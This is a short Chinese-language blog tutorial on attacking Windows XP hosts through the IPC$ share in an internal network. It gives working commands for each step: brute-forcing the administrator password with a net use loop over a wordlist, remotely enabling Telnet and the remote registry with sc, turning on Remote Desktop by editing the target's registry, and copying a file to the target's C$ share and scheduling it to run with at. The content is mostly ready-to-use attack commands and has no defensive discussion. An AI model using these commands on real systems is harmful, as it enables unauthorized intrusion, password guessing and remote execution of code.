内网渗透之ipc$漏洞

渗透环境xp

1、使用dos命令暴力破解远程ipc$主机密码

for /f %a in (e:\字典文件.txt) do net use \\对方ip地址\ipc$ %a /user:administrator

这条命令进行密码爆破吗,等到命令框显示”不允许一个用户使用一个以上用户名与服务器”即可停止,即可成功获取到密码 图片

使用 net use 命令可以查看是否与目的主机建立连接 ,net use * /del 命令可以清除当前连接状态 图片

2、开启telnet服务

sc \\192.168.2.132 query tlntsvr  查看对方telnet服务的状态
sc \\192.168.2.132 config tlntsvr start= "auto"  telnet服务设置为自动启动
 图片 
sc \\192.168.2.132 start tlntsvr 启动远程主机telnet服务
图片

3、开启3389端口

reg add "\\192.168.2.132\hklm\system\currentcontrolset\control\terminal server" /v fdenytsconnections /t reg_dword /d 0

开启3389端口,若提示错误: 找不到网络路径。原因远程注册表服务没有开启

图片
sc \\192.168.2.132 config remoteregistry start= "auto"
sc \\192.168.2.132 start remoteregistry 开启远程桌面服务

4、远程结合计划任务执行文件

copy  本机文件路径 \\目标IP\c$  //这样即可把本地文件复制到目的主机的c盘上
net time \\目标ip    //查看目标电脑时间
at \\目标IP 执行时间 c:\文件名  //随后为目标电脑增加计划任务,在指定时间执行指定文件

发表评论

电子邮件地址不会被公开。 必填项已用*标注